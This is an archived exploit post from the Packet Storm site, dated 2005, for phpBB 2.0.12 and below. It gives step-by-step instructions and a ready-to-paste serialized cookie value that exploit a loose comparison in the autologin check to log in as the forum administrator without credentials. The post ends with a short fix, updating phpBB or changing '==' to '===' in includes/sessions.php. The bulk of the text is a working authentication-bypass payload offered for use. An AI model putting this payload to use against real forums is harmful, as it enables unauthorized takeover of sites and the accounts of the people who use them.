exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

phpbb2012.txt

phpbb2012.txt
Posted Mar 17, 2005
Authored by pureone

phpBB versions 2.0.12 and below have a flaw that allows for access to the admin control panel without authorization.

tags | exploit
SHA-256 | b8a59235613e9e76d6729f2ba7f08567a2ed061dc3fc891e1d0c03668520b2fd
Download | Favorite | View

phpbb2012.txt

Change Mirror Download
--------------------------------------------------------------------
Written by pureone@spywire.net
--------------------------------------------------------------------
--------------------------------------------------------------------
Exploit : 2.0.x >= phpbb 2.0.12 :
--------------------------------------------------------------------
Lets get on with the show shall we?
your need firefox which is found > http://www.mozilla.org/
your also need the HTTP live headers plug in found > 
http://livehttpheaders.mozdev.org/
ok once installed find your self a phpbb forum i suggest you install one 
localy
you may need http://www.apachefriends.org/en/xampp.html
&  http://prdownloads.sourceforge.net/phpbb/phpBB-2.0.12.zip?download

ok once installed open your browser at http://127.0.0.1
open HTTP live headers which is found in tools.

look for the packet that says

GET /phpbb2/index.php HTTP/1.1
Host : localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) 
Gecko/20041107 Firefox/1.0
Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 

Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: phpbb2support_data=a%3A0%3A%7B%7D

click replay
On this line
Cookie: phpbb2support_data=a%3A0%3A%7B%7D
Replace the a%3A0%3A%7B%7D with
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

then once again click replay.
now you should beable to see the admin control panel.
and you will be logged in as the admin.
exploited!
--------------------------------------------------------------------
Solution :
-------------------------------------------------------------------
update to phpbb 2.0.13 or what ever version is out
at the present time of reading this.

or

open> includes/sessions.php
find
if( $sessiondata['autologinid'] == $auto_login_key )

replace with
if( $sessiondata['autologinid'] === $auto_login_key )

------------------------------------------------------------------------
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close